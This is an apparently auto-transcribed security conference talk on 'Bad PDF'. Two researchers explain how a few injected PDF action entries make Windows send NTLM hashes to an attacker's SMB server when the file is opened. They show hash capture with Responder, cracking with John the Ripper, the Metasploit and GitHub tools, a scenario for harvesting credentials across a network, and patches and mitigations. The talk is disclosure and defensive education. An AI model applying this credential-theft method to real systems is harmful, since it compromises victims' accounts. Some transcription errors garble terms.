
Hello everybody, welcome to Bad PDF: Stealing Windows Credentials via PDF files with Adi and Ido. Give everybody, give them a round of applause. Thank you everyone for coming. It is a pleasure for us to be here. I am Adi and this is Ido and today we will be presenting Bad PDF: How Windows Credentials Can Be Leaked by Manipulating PDF Files. We conducted this research following recent publications regarding stealing passwords by manipulating Microsoft Outlook. We wanted to show that the same can be done with PDF. And we have managed to do so. We apologize in advance for our tough Israeli accent, and I hope you will manage to understand us through this presentation.
Great, so the flow of this presentation will be first to talk about PDFs in general and its relevant format, then talk about the attack flow, provide a proof of concept, and then talk about the impact and the mitigation regarding this attack. So a bit about myself. I hold the position of IPS research team leader. We conduct research on interesting devices, vulnerabilities, and attacks based on our sensors worldwide. This story is a good example of that. Prior to Check Point, I have served as an officer in an Israeli military intelligence unit in various R&D positions. My academic background includes a master's in financial mathematics and a bachelor in applied mathematics. And I can say, in general, I really, really love network protocols. I'm not sure why, but I do. I
mean, I love to see the gaps between how protocols should be implemented by the RFC and how eventually they are implemented in the wild. And in my free time, I love to play soccer. I wasn't that good at IDO, but I really, really tried. But I wasn't in the front line. And this is a picture of my team playing laser tag. It was a really good experience, and I highly recommend. And I'm IDO. I'm a security researcher in this team. I served in the Israeli Air Force Intelligence Wing, and my academic background includes Bachelor of Science in Information System Engineering. Also, I was not allowed to add memes to this presentation, so you will have
to do without. Okay, so let's talk about PDF in general. PDF was first developed by Adobe in the 90s, and since then many versions were published during the years. I can also say that in general the original purpose of PDF is to present documents, including text, images, and other types of data, without any dependency on the environment that the file runs on. And this is something that I would like you to understand. So the PDF file structure has four main components. The first one is the head, which basically contains the version of the PDF file, for instance, PDF 1.3. And the body. The body contains all the objects that make up the file. And we will talk about those
objects in a second. And this is, again, an example for an object within the body. And the cross-reference table is actually a table that contains info regarding how to access those objects. And this is, again, an example. and the trailer, which is basically the metadata of the file, for instance the size of the file, as we can see. And this is all together: first the header, then the body, then the cross-reference label, and the trailer. And all of this make up the PDF file. So there are eight types of objects within a PDF file, and let's name a few: numbers, strings, boolean values, names, and in our specific case we will focus mainly on dictionaries.
So a dictionary is a table that contains pairs of objects, keys and values, and in our terminology they are called entries. And more specifically, page objects are dictionaries that represent a page within a PDF file. And each of those consists of several mandatory and optional entries. And this is an example for a page object. And let's talk about the relevant entries for our research. So the first one is AA. It's a parent entry that contains action to be performed in general. And in many cases, it comes with either O or C. O is a child entry that contains action to be performed once the file is opened. And C is another child entry that contains actions to be performed once the file is closed. And
we can see in our example that we have an AA entry, comes with O. And the O contains FDNS entries.
So let's talk about relevant entries. S describes the type of the action to be performed. For instance, go to E action, go to embedded. And let's mention what it is. Go to E means to open an external PDF file without notifying the user. Interesting. F describes the location of the other PDF file. For instance, a remote server. And D describes the location to go to within that document. Great. So we talked about PDF in general, how PDF file is structured. We talked about what objects and entries are, and we talked about the relevant ones for our research. So now it's time to understand what can we do with it. So like good students, let's use what we learned. And in addition, I would also like to mention
SMB, Server Message Block Protocol, which is a very popular protocol that provides many services within networks. This protocol is implemented in many networks. We can also say that this protocol was used in many attacks in the past few years, and we can mention WannaCry, for instance, as a significant example. So now, I will let Ido present what we can do with it. Right. So, here you can see the proof of concept code that our team developed. We've used an action dictionary with an "aa" and "o" entries to make sure that the exploit runs as soon as the PDF file is opened. We then use the F, D and S entries to point the PDF reader to an arbitrary file on our remote SMB server. These five entries are all
that you need to inject into a previously benign PDF file in order to weaponize it. So, let's see what happens when the file is opened. As soon as a PDF file is opened, a request for the arbitrary file we specified, in this case dummy.pdf, is sent to our remote SMB server. Now, we should note two things here. The first, is the arbitrary file does not have to be PDF. It could be any file at all as long as it exists on the SMB server. And the second, while the example here uses the "go to e" action inside the SMTree, as in "go to embedded", the "go to r" "go to remote" is just as vulnerable and can be exploited in the exact same manner. So,
as soon as the request is sent, the victim's Windows client attempts to authenticate it with the remote server using NTLM Single Sign-On. As part of that protocol, the victim's NTLM details - username, domain name, NTLM hash, and others - are sent to the remote server. And these are easily interceptable by the attacker, as you can see here. This is an example Wireshark capture of an attempt to authenticate using NTLM Single Sign-On. We can see here in plain text that the username Alice, from the domain "donut", try to authenticate and we can see an NTLM hash, again in plain text. The attacker can then crack the NTLM hash using publicly available tools and thus recovering the Windows credentials of the victim. So to sum that
up, we can weaponize a PDF by injecting very few lines of code. This means that even without prior knowledge of PDF structure or vulnerabilities, an attacker can have a working malicious PDF file in a matter of minutes. even less if using a public implementation of the exploit that we'll see later in this presentation. The target must only be enticed to open the PDF file for the credentials to be leaked. And now, and this is the biggest takeaway here, this is all done without any security alert or any evidence of the attack. There's no malicious processes running in the background, no registry keys, been changed, no residue, nothing. Now, let's see an example of an attack using this exploit.
Here we've got an attacker using Kali Linux. And the first thing it does is to set up a responder in order to intercept and capture any NTLM hashes. Next, the attacker uses one of the public implementations of the exploit to generate a malicious PDF file pointing to his SMB server, which is, in this case, running the responder service. Now, as you can see, the content of the malicious PDF are identical to our POC, except, of course, the URL of the malicious server. Now, it also runs an HTTP server to host the PDF file. Now, switching to the victim's view,
The victim now downloads the malicious PDF file from the attacker server. And as you can see from the victim's point of view, nothing bad really happened when the PDF was opened. Back to the attacker, we can look at the responder's logs and we'll soon find the captured NTLM hash. It's blurry in this case. So let's say we've captured our victim's NTLM hash. Now what do we do? Simple. We crack it using one of many publicly available tools. We can use AshCat, John the Ripper, and many others. Of course, we can also run a Google search and use an online tool. There are many of those, as you can see right here. In our example, we've used John the Ripper to crack the NTLM hash of
Rovigda. You can see the usage is very simple. All we have to do is capture the hash in a file, No other settings need to be tweaked and as you can see right here, cracking the NTLM hash for user bsides_sf gave us their password: badpdf. So, let's think of a scenario where badpdf could be used. The first scenario that comes to mind, the most naive one, is also the most obvious one. An attacker uses an exploit, in our case badpdf, to gain an initial foothold on the target network.
The attacker then uses these credentials to deploy a payload. It could be a bot, it could be a miner, it could be a reverse shell, it could be anything they want, before using other exploits to spread laterally throughout the network. This is fine and everything, but we want something a bit more unique to badpdf. So let's think of another scenario. This one starts about the same as the first scenario, using badpdf to steal the credentials of a user inside the target network. Except this time, the attacker uses the stolen credentials to access a file server inside the network. it then injects the exploit code into a PDF that is available to every user inside the network. That way, every time a user in that network opens
the PDF, their MTLM hash is leaked to the attacker. Which basically means that the attacker is harvesting credentials from the entire network. Scary. Now, let's talk about a few of the implementations that already exist in the wild. The first one is the Metasploit module. Let's take a look at that one. This Metasploit module features two basic functions. The first is to generate from scratch a malicious PDF using the exploit, again, using our POC code. And the other option is to inject a one-liner of that PDF into a previously benign PDF file, as you can see here. Again, just like the POC, using the A, A and O entries, followed by the F, D and S entries. Another implementation, the
one that we've seen in the video, is currently up on GitHub. Let's take a look at that. Much like the Metasploit module, this one also lets you generate from scratch the same PDF, the same exploit that points to your server. What sets this one apart from the Metasploit module is that it also runs Responder for the user, which means that an attacker using this implementation must only follow the instructions on screen, provide his server URL, file name, and the interface to listen on, and the code will do everything for him, from generating the PDF to capturing the NTLM hashes. Of course, you still have to deliver the PDF and entice the victim to open it, but that's a
different issue. Now, Adi will talk about the impact of the exploit. Great. So let's talk a bit about the impact of this research. You can say that in general, it really raves the public awareness to PDF vulnerabilities in general. It gained worldwide attention. It was published in many services, such as Bipping Computer, ZDNet, as well as others. And we also saw this phenomenon of tools that try to implement this research. For instance, we talked about the Metasploit and the GitHub, but there are many, many more. Also, we saw that the #BadPDF hashtag became pretty popular. We saw it on LinkedIn and Twitter and other stuff. And this CV was assigned to this vulnerability. And from now on, this is
the CV. And those are examples for articles that were published. Wait, so now let's talk about mitigation in general. So network level wise, you can deploy various IPS solutions and they all will be fine. OS level wise, so Windows, Microsoft published a security update regarding this vulnerability, as well as Adobe that also patched this vulnerability through this security update, and Foxit that also patched this vulnerability.
Great, so let's wrap things up. We showed that by using simple manipulations, one can get your NCLM credentials. The attacker just has to understand how to develop the relevant code, how PDF file is structured, to understand the relevant syntax, and it can cause serious damage. And no further evidence will be experienced by the user. And this is something that I would like you to understand and take from this lecture. In addition, The attacker can leverage this attack and cause even more serious damage. And we gave two examples for it, as there are many more. Another thing is that we showed you two relevant tools to implement this vulnerability. We don't encourage you to hack, but if you will try to
do so, maybe we will catch you. Thank you very much. It's been a pleasure. Thanks, guys. So we have a couple minutes for questions, if anybody has any. Yes. So this vulnerability was seen only on Windows or any other operating system? Was it seen on any other OS? I'm sorry? Can you repeat that? Can you repeat? This vulnerability that you showed, the bad PDF vulnerability, was it seen on any other operating system apart from Windows? Sorry, can you... Can you repeat again? It's kind of hard to... Did you see this on any other operating system besides Windows? I'm sorry? If it only affects Windows? Yeah, like any other platform. Definitely. Yes? Yeah. Any other questions? You have a
question over there. This is a problem, actually a legitimate SMB question. You asked about how SMB in general will be prevented by using firewalls and other kind of... Actually, again, this all comes down to security implementation inside the network. Depends on that. If you shut down SMB outbound, so... it will stop the connection. You can assure it will happen inside every network. Is there a way to detect this kind of bad PDFs before it's been opened? Can you repeat that? Can you repeat again? How do you detect this kind of bad PDFs before it's even been executed on your local computer? So, you're asking how to detect this exploit. First of all, like we've said, you can use IPS solutions that
will... Find malicious code inside a PDF so in the form of a static analysis again You will have to look for the outbound as some big connections. Well, it won't be a 100% positive But it will be good way to look for the X way. You cannot say that go to ego to our Actions are suspicious in general. So it's something that again static analysis any other questions? Awesome, thank you so much guys. Thank you.